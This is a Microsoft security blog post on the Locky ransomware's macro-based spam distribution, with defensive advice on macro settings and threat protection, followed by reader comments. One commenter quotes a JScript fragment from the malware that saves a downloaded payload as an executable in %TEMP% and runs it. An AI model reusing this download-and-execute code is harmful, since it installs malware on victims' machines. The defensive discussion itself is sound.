Locky malware, lucky to avoid it


You may have seen reports of the Locky malware circulating the web; we think this is a good time to discuss its distribution methods, and reiterate some best-practice methods that will help prevent infection.

We’ve seen Locky being distributed by spam email, not in itself a unique distribution method, but this means that spreading is broad and not isolated to any particular region. This ransomware knows no borders, and we’ve seen high infection rates across the world.
The Locky email attachment usually arrives as a Word document, but could also be an Excel document, that appears to be an invoice. We’ve also seen the following downloaders distribute Ransom:Win32/Locky.A:

If you open this file and allow the macro to run, the malware is downloaded and runs on your PC, encrypting your files. A ransom message is then displayed demanding payment in order to unlock your encrypted files. Note that once your files are encrypted, the only guaranteed way to restore them is from backup. Microsoft does not recommend you pay the ransom; there is no guarantee that this will give you access to your files.

While Microsoft detects and removes Locky, we recommend you disable macros to help prevent this and other macro-downloaded threats from infecting your PC, and then only enable macros that you trust, on a case-by-case basis. To help keep your enterprise secure, consider using a trusted location for files in your enterprise, then you can store documents that require macros there.  You can also use our cloud protection services to help boost your protection; this, and other advice on how to help keep your PC protected are outlined below.

 

Disable all except digitally signed macros in Microsoft Word

To help prevent malicious files from running macros that might download malware automatically, we recommend you change your settings to disable all except digitally signed macros.

To do this:

1. Open a Microsoft Word document.
2. Click the File tab.
3. Click Options.
4. In the Trust Center, click Trust Center Settings.

Trust Center settings

5. Select Disable all macros except digitally signed macros.

Macro settings in Trust Center

6. Click OK.

 

Block macros from running in Office files from the Internet in your enterprise

Office 16 provides a Group Policy setting that enables you to block macros from running in Word, Excel and PowerPoint files from the Internet. Read about how to block macros from running in Office 16 files from the Internet.

 

Only enable trusted content

If you have disabled macros, when you open a file that has macros you’ll see a message bar similar to the following:

Enable macro message

Only click Enable Content if you trust the file, that is, you know where it’s from and are certain that running the macro is harmless.

 

Use advanced threat and cloud protection

You can boost your protection by using Office 365 Advanced Threat Protection and also enabling Microsoft Active Protection Service (MAPS).

Office 365 helps by blocking dangerous email threats; see the Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks, for details.

MAPS uses cloud protection to help guard against the latest malware threats. You should check if MAPS is enabled on your PC.

 

Help prevent malware infections on your PC

There are a number of other things you can do to help prevent malware infections, for example:

 

So to wrap this up: this ransomware is bad, but infection is preventable! Microsoft detects and removes this threat, but by ensuring that you only run known, trusted macros, you’ll help prevent a Locky infection – and any other malware that relies on malicious macros. Generally, a good approach is to only allow digitally signed macros that you trust to run on any of your documents.

Stay safe, from all of us at the MMPC.

-Jasmine Sesso, MMPC

Comments (26)

  1. Ryan Steele says:

    This is good advice, but you may want to clarify that when you select the “Disable all macros except digitally signed macros” option, users can still enable them on a per-document basis by clicking the “Enable Content” button. In the examples we have seen, the text of the malicious document explicitly instructs the user to do just that, so this is not a very effective mitigation strategy.

    If possible, I recommend creating a group policy to enforce the “Disable all macros without notification” setting for all users. If some staff do use macros, you can create a security group in AD with “Deny” rights on the GPO and add users as needed (after training them to avoid the malicious attachments, of course).

  2. Adwbust says:

    Not to mention, got a doc file from spam and mse doesn’t detect it..

    Release an office update that auto blocks all unsigned macros from running and send samples to MAPS cloud when user chose to run an unsigned macro. But I’d rather you remove that run option from notification!

    1. Adwbust says:

      Md5 is “d21efde4714e11fa061363c73dd9ff65”
      Is this a macro dropper? Mse doesn’t detect it!

  3. As usual you missed the first line of defense which inhibits Locky (or any other unwanted program) to run, independent of the way of intrusion: APPLICATION WHITELISTING.
    Since Windows XP this can be enabled on ALL editions of Windows (including Home, Embedded and Starter) via Software Restriction Policies: see http://home.arcor.de/skanthak/SAFER.html

    Cf. https://technet.microsoft.com/en-us/library/cc740025.aspx too!

    1. Mark Payton says:

      @Stefan Kanthak,

      Have you had success using this with Office 2016 installed via click-to-run (in my experience, one of the poorer decisions Microsoft has ever made)? I am early in the process of setting up an SRP but it appears that many of the dll’s for O2016 run from AppData when installed this way. As this is a read/write directory this is NOT a good thing.

      1. Running applications from %APPDATA% or another user-writeable directory is a COMPLETELY BRAINDEAD idea … and of course COMPLETELY BROKEN design.
        If you still want to run crapware which installs to %APPDATA%: if the executables are digitally signed create a SAFER certificate rule. If they are not signed: sign them with your certificate and create a SAFER certificate rule.

        1. wadeface says:

          The person you are replying to was discussing how Office including 2016 extracts to and runs parts of its installation from AppData.

      2. Michel Christaller says:

        We do use both SRP (win7) and Applocker (Wn10) and they work perfectly with Click to run instances of Office 365. We deploy Office using the setup.exe as administrator so Office files are not in the user’s appdata folder.

  4. Susan says:

    SRP has a lot of overhead though and Device Guard (Win10’s app whitelisting solution) is only for Enterprise skus. You may need to look at third party solutions. One I’m looking at is http://alpha.whitecloudsecurity.com/protect-your-company

    1. The overhead of SAFER is barely noticeable.
      I’ve setup some thousands PCs where SAFER is activated during setup (before the first user can login) during the last 12 years and can’t tell any difference.
      Anti-virus needs way more ressources.

  5. x41 says:

    You also should use a proxy. If locky can’t access a C&C Server, it won’t get a encryption key and therefore does no harm to your files.
    At least, not yet.

  6. Kelly Powers says:

    It would be helpful if Office 365 would allow customers to block\quarantine attachments which have macros. Most mail gateways and firewalls on the market allow the option to block\quarantine incoming attachments with macros. Office 365 does not have this option. This is an oversight which is actively placing O365 customers in danger. Clients have had Locky end up in their inbox repeatedly as O365 has struggled to keep up with the variants. When will MS allow the blocking\quarantine action within O365? This alone would offer another reasonable and obvious layer of protection, and has been something O365 customers have been requesting for months as cryptoware continues to spread through this attack vector. In the meantime, for customers who wish to stick with O365, perhaps the only solution would be to have to create mail flow rules to basically loop through an on-premesis mail relay which will perform this function since O365 cannot, which isn’t ideal for small businesses. Or Microsoft, really. If we want customers to be in the cloud, then we have to provide what the rest of the industry provides for macro virus mail protection. This option is very basic, widespread through the industry, and there is no valid reason why this has not already been deployed to O365 customers. Make it happen.

  7. Eoin Ryan says:

    One great response from Microsoft (given the explosive growth in O365) might be to add the Office 365 Advanced Threat Protection as a free add-in to ALL O365 subscriptions.

  8. ed roberts says:

    Got infected with locket,half programs gone.talk about stressed wow

    1. ed roberts says:

      Should read lockey

  9. Jim says:

    I clicked on this link and got a German language page. NO HELP.
    https://technet.microsoft.com/DE-DE/library/ee857085%28v=office.16%29.aspx#blockvba

  10. Nikola Kosić says:

    Hi,

    After >20 years Office provide limited to none options on macros. So we have option to run or do not run macros..

    I wrote macros for simple usage, and they are used by low experience users..

    And MS have no intention on adding any option that is really useful, instead we are using stupid hack solution like disable all macros and “training” users.

    Big thumb down for this..

    Regards, Nikola.

    1. ASB says:

      You can also sign your macros, and disable any macros that are not signed.

  11. Okmonica says:

    But how do I un-encrypt (de-encrypt?) all of the files that were encrypted by the Ransomware??? I can’t find this anywhere online. Any file–example, every word doc, excel doc, music file, picture, etc… has an additional extension at the end called “.crypt” … at one point while my computer was being scanned i was able to open my pictures, but now, several hours later, all of the pictures and videos have the same encryption extension that the word documents had.

    I downloaded the virus by pressing ok to what appeared to be a legitimate (even had a Microsoft Certificate!) notification to update “Microsoft Activation Technologies.” It was not a word document or email attachment as I’ve seen described on this site.

    Note that i used Windows defender and the online Microsoft Safety Scanner (as of 4/20/16, when i downloaded the virus) to do a full scan and they said the computer is clean. I have not restarted the computer yet out of fear it would make things worse.

    Any advice on what to do to recover my files (outside of the obvious: delete it all and then restore from a back up”) are needed.

    some related questions:
    1. Am i in danger of infecting my computer more if i try to re-name the files by removing the “.crypt” extension manually? And would this even work to recover each file?
    2. If I tried to do a “system restore” back to a recent date, rather than to go from an external harddrive, would it even work, or would it cause more problems, or will i have my files back?

    1. Pete says:

      Unfortunately changing the file extensions won’t get your files back. The only way to recover them is from backup, or pay the ransom.

  12. martin marlborough says:

    Lost all my files to this virus, Lots of work down the drain.

  13. Domas says:

    The malware was executed by opening a .js file in updated Windows 7. The payload was downloaded using ActiveXObject.MSXML2.XMLHTTP an then executed as follows:
    var file_path = ActiveXObject.WScript.Shell.ExpandEnvironmentStrings(“%TEMP%”) + “/GLtKojHUYhT.exe”;
    ActiveXObject.ADODB.Stream.open();
    ActiveXObject.ADODB.Stream.type = 1;
    ActiveXObject.ADODB.Stream.write(ActiveXObject.MSXML2.XMLHTTP.ResponseBody);
    ActiveXObject.ADODB.Stream.saveToFile(file_path, 2);
    ActiveXObject.ADODB.Stream.position = 0;
    ActiveXObject.ADODB.Stream.close();
    ActiveXObject.WScript.Shell.Run(file_path, 1, false)

    Payload was downloaded from Brasilian domain.

    1. 486DX50 says:

      What version of IE do you use?

  14. Linda says:

    Well Microsoft certainly didn’t detect or remove it from my computer I ran the defender scan and it came up with nothing. Even ran spybot and it came up with nothing. What now????

  15. san says:

    question is: can ransomware encrypt an already encrypted file that was encrypted by BitLocker?
    what is preventing ransomware “not” to be able to put another encryption layer of encryption on top of BitLocker or any other cryptosystem that encrypts files for users to provide more privacy?

Skip to main content